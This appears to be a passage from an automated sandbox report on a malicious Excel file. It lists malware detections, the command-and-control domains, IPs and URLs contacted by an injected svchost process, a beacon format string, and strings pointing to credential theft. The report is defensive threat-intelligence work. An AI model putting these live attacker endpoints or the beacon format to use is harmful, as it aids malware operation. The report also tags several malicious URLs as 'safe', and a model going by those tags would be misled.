          6.3.svchost.exe.5c00000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          12.2.svchost.exe.bc00000.0.unpack100%AviraHEUR/AGEN.1122461Download File
          6.2.svchost.exe.10000000.3.unpack100%AviraTR/Kryptik.avp.8Download File
          6.3.svchost.exe.5100000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          6.3.svchost.exe.5100000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          mac-rail.com6%VirustotalBrowse
          accesoeducativo.com1%VirustotalBrowse
          overnightfile.com4%VirustotalBrowse
          gaw.explik.at6%VirustotalBrowse
          low.explik.at9%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.entity.0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          http://overnightfile.com/4/forum.php00715ysmLMEM8(0%Avira URL Cloudsafe
          https://wus2-000.contentsync.0%URL Reputationsafe
          https://wus2-000.contentsync.0%URL Reputationsafe
          https://powerlift.acompli.net0%VirustotalBrowse
          https://powerlift.acompli.net0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%VirustotalBrowse
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://api.aadrm.com/0%VirustotalBrowse
          https://api.aadrm.com/0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
          https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
          https://sherdornyc.com/wp-content/themes/futurio/3w0%Avira URL Cloudsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%VirustotalBrowse
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%VirustotalBrowse
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
          http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
          https://officeci.azurewebsites.net/api/0%VirustotalBrowse
          https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
          https://accesoeducativo.com/wp-content/themes/futurio/2https://accesoeducativo.com/wp-content/themes0%Avira URL Cloudsafe
          https://store.office.cn/addinstemplate0%VirustotalBrowse
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          http://cps.letsencrypt.org00%URL Reputationsafe
          http://cps.letsencrypt.org00%URL Reputationsafe
          https://wus2-000.pagecontentsync.0%URL Reputationsafe
          https://wus2-000.pagecontentsync.0%URL Reputationsafe
          http://overnightfile.com/d2/about.php5%VirustotalBrowse
          http://overnightfile.com/d2/about.php0%Avira URL Cloudsafe
          https://store.officeppe.com/addinstemplate0%VirustotalBrowse
          https://store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%VirustotalBrowse
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://www.odwebp.svc.ms0%VirustotalBrowse
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://sherdornyc.com/wp-content/themes/futurio/10%Avira URL Cloudsafe
          https://sherdornyc.com/wp-content/themes/futurio/30%Avira URL Cloudsafe
          https://sherdornyc.com/wp-content/themes/futurio/20%Avira URL Cloudsafe
          https://dataservice.o365filtering.com/0%VirustotalBrowse
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%VirustotalBrowse
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%VirustotalBrowse
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          http://overnightfile.com/4/forum.phpd0%Avira URL Cloudsafe
          http://overnightfile.com/4/forum.phpect0%Avira URL Cloudsafe
          http://api.ipify.org0.0.0.0GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID=%I64u&BUILD=%0%Avira URL Cloudsafe
          http://overnightfile.com/4/forum.php1%VirustotalBrowse
          http://overnightfile.com/4/forum.php0%Avira URL Cloudsafe
          https://apis.live.net/v5.0/0%VirustotalBrowse
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://accesoeducativo.com/x/1.16.10%Avira URL Cloudsafe
          http://https://ftp://operawand.dat_Software0%Avira URL Cloudsafe
          ftp://http://https://ftp.fireFTPsites.datMozilla0%Avira URL Cloudsafe
          http://www.ibsensoftware.com/3%VirustotalBrowse
          http://www.ibsensoftware.com/0%URL Reputationsafe
          http://www.ibsensoftware.com/0%URL Reputationsafe
          https://accesoeducativo.com/0%Avira URL Cloudsafe
          https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
          https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
          https://accesoeducativo.com/obalSCAPE0%Avira URL Cloudsafe
          https://accesoeducativo.com/wp-content/themes/futurio/20%Avira URL Cloudsafe
          https://accesoeducativo.com/wp-content/themes/futurio/13%VirustotalBrowse
          https://accesoeducativo.com/wp-content/themes/futurio/10%Avira URL Cloudsafe
          https://accesoeducativo.com/wp-content/themes/futurio/30%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mac-rail.com
          		5.101.51.247
          		truetrueunknown
          elb097307-934924932.us-east-1.elb.amazonaws.com
          		54.225.191.113
          		truefalse
            		high
            accesoeducativo.com
            		185.206.163.136
            		truetrueunknown
            overnightfile.com
            		91.218.231.226
            		truetrueunknown
            gaw.explik.at
            		8.208.80.226
            		truetrueunknown
            low.explik.at
            		8.208.80.226
            		truetrueunknown
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://api.ipify.org/false
                		high
                http://overnightfile.com/d2/about.phptrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://overnightfile.com/4/forum.phptrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.diagnosticssdf.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                  		high
                  https://login.microsoftonline.com/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                    		high
                    https://shell.suite.office.com:1443D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                      		high
                      https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                        		high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                          		high
                          https://cdn.entity.D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://overnightfile.com/4/forum.php00715ysmLMEM8(svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://wus2-000.contentsync.D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://clients.config.office.net/user/v1.0/tenantassociationkeyD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                            		high
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                              		high
                              https://powerlift.acompli.netD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                              • 0%, Virustotal, Browse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://rpsticket.partnerservices.getmicrosoftkey.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                              • 0%, Virustotal, Browse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://lookup.onenote.com/lookup/geolocation/v1D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                		high
                                https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                  		high
                                  https://api.powerbi.com/v1.0/myorg/importsD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                    		high
                                    https://cloudfiles.onenote.com/upload.aspxD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                      		high
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                        		high
                                        https://entitlement.diagnosticssdf.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                          		high
                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                            		high
                                            https://api.aadrm.com/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                            • 0%, Virustotal, Browse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://ofcrecsvcapi-int.azurewebsites.net/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://sherdornyc.com/wp-content/themes/futurio/3wsvchost.exe, 00000006.00000002.707778201.0000000002800000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                              		high
                                              https://api.microsoftstream.com/api/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                		high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                  		high
                                                  https://cr.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                    		high
                                                    https://portal.office.com/account/?ref=ClientMeControlD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                      		high
                                                      http://www.reddit.com/msapplication.xml5.19.drfalse
                                                        		high
                                                        https://ecs.office.com/config/v2/OfficeD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                          		high
                                                          https://graph.ppe.windows.netD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                            		high
                                                            https://res.getmicrosoftkey.com/api/redemptioneventsD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                            • 0%, Virustotal, Browse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://powerlift-frontdesk.acompli.netD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                            • 0%, Virustotal, Browse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://tasks.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                              		high
                                                              http://cps.root-x1.letsencrypt.org0svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://officeci.azurewebsites.net/api/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                		high
                                                                https://accesoeducativo.com/wp-content/themes/futurio/2https://accesoeducativo.com/wp-content/themessvchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://store.office.cn/addinstemplateD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                • 0%, Virustotal, Browse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://cps.letsencrypt.org0svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://wus2-000.pagecontentsync.D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                  		high
                                                                  https://globaldisco.crm.dynamics.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                    		high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      		high
                                                                      https://store.officeppe.com/addinstemplateD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://dev0-api.acompli.net/autodetectD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.odwebp.svc.msD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		low
                                                                      https://sherdornyc.com/wp-content/themes/futurio/1svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://api.powerbi.com/v1.0/myorg/groupsD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                        		high
                                                                        https://web.microsoftstream.com/video/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                          		high
                                                                          https://sherdornyc.com/wp-content/themes/futurio/3svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://sherdornyc.com/wp-content/themes/futurio/2svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://graph.windows.netD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                            		high
                                                                            https://dataservice.o365filtering.com/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://officesetup.getmicrosoftkey.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://analysis.windows.net/powerbi/apiD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                              		high
                                                                              https://prod-global-autodetect.acompli.net/autodetectD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                              • 0%, Virustotal, Browse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://outlook.office365.com/autodiscover/autodiscover.jsonD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                		high
                                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                  		high
                                                                                  http://cert.int-x3.letsencrypt.org/07svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                      		high
                                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                        		high
                                                                                        http://overnightfile.com/4/forum.phpdsvchost.exe, 00000006.00000002.708220563.0000000002894000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.youtube.com/msapplication.xml8.19.drfalse
                                                                                          		high
                                                                                          http://overnightfile.com/4/forum.phpectsvchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://api.ipify.org0.0.0.0GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID=%I64u&BUILD=%regsvr32.exe, 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, svchost.exe, 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                              		high
                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                		high
                                                                                                http://weather.service.msn.com/data.aspxD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                  		high
                                                                                                  https://apis.live.net/v5.0/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		low
                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                    		high
                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                      		high
                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                        		high
                                                                                                        https://accesoeducativo.com/x/1.16.1svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://https://ftp://operawand.dat_Softwaresvchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		low
                                                                                                        https://management.azure.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                          		high
                                                                                                          https://incidents.diagnostics.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                            		high
                                                                                                            https://clients.config.office.net/user/v1.0/iosD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                              		high
                                                                                                              ftp://http://https://ftp.fireFTPsites.datMozillasvchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		low
                                                                                                              http://www.ibsensoftware.com/svchost.exe, svchost.exe, 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmpfalse
                                                                                                              • 3%, Virustotal, Browse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://insertmedia.bing.office.net/odc/insertmediaD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                		high
                                                                                                                https://accesoeducativo.com/svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://o365auditrealtimeingestion.manage.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                    		high
                                                                                                                    https://incidents.diagnosticssdf.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                      		high
                                                                                                                      https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://asgsmsproxyapi.azurewebsites.net/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		low
                                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                          		high
                                                                                                                          http://www.amazon.com/msapplication.xml.19.drfalse
                                                                                                                            		high
                                                                                                                            https://accesoeducativo.com/obalSCAPEsvchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://app.powerbi.com/taskpane.htmlD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                              		high
                                                                                                                              https://accesoeducativo.com/wp-content/themes/futurio/2svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://entitlement.diagnostics.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                                		high
                                                                                                                                https://accesoeducativo.com/wp-content/themes/futurio/1svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmpfalse
                                                                                                                                • 3%, Virustotal, Browse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                                  		high
                                                                                                                                  http://www.twitter.com/msapplication.xml6.19.drfalse
                                                                                                                                    		high
                                                                                                                                    https://accesoeducativo.com/wp-content/themes/futurio/3svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPCountryFlagASNASN NameMalicious
                                                                                                                                    8.208.80.226
                                                                                                                                    		Singapore
                                                                                                                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                    54.225.191.113
                                                                                                                                    		United States
                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                    5.101.51.247
                                                                                                                                    		Russian Federation
                                                                                                                                    		49505SELECTELRUtrue
                                                                                                                                    91.218.231.226
                                                                                                                                    		Russian Federation
                                                                                                                                    		203226IHCRUInternet-HostingLtdMoscowRussiaRUtrue
                                                                                                                                    185.206.163.136
                                                                                                                                    		Germany
                                                                                                                                    		47583AS-HOSTINGERLTtrue

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:29.0.0 Ocean Jasper
                                                                                                                                    Analysis ID:1179994
                                                                                                                                    Start date:14.07.2020
                                                                                                                                    Start time:11:19:04
                                                                                                                                    Joe Sandbox Product:Cloud
                                                                                                                                    Overall analysis duration:0h 8m 58s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:tr_0.xls
                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit (version 1803) with Office 2016 Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
                                                                                                                                    Number of analysed new started processes analysed:24
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.bank.troj.spyw.expl.evad.winXLS@19/52@10/5
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 56.7% (good quality ratio 54.1%)
                                                                                                                                    • Quality average: 82.5%
                                                                                                                                    • Quality standard deviation: 26.6%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 88%
                                                                                                                                    • Number of executed functions: 154
                                                                                                                                    • Number of non-executed functions: 74
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                    • Changed system and user locale, location and keyboard layout to English - United States
                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                    • Attach to Office via COM
                                                                                                                                    • Scroll down
                                                                                                                                    • Close Viewer
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, ielowutil.exe, wermgr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.42.23, 52.109.32.27, 52.109.12.20, 51.143.111.7, 2.18.104.47, 152.199.19.161, 23.39.87.170
                                                                                                                                    • Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, config.edge.skype.com.trafficmanager.net, ie9comview.vo.msecnd.net, prod.configsvc1.live.com.akadns.net, config-edge-skype.l-0014.l-msedge.net, prod.nexusrules.live.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, config.officeapps.live.com, go.microsoft.com.edgekey.net, l-0014.l-msedge.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, config.edge.skype.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, cs9.wpc.v0cdn.net
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Signature Similarity

                                                                                                                                    Sample Distance (10 = nearest)
                                                                                                                                    10 9 8 7 6 5 4 3 2 1
                                                                                                                                    Samplename Analysis ID SHA256 Similarity

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    11:20:46API Interceptor424x Sleep call for process: svchost.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    8.208.80.226look_presentation#_94875.vbsGet hashmaliciousBrowse
                                                                                                                                      54.225.191.113jdruBkJUZi.exeGet hashmaliciousBrowse
                                                                                                                                      • api.ipify.org/
                                                                                                                                      DHL_AWB#Tracking.exeGet hashmaliciousBrowse
                                                                                                                                      • api.ipify.org/

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      elb097307-934924932.us-east-1.elb.amazonaws.com58afNmgh8T.exeGet hashmaliciousBrowse
                                                                                                                                      • 174.129.214.20
                                                                                                                                      58afNmgh8T.exeGet hashmaliciousBrowse
                                                                                                                                      • 107.22.251.25
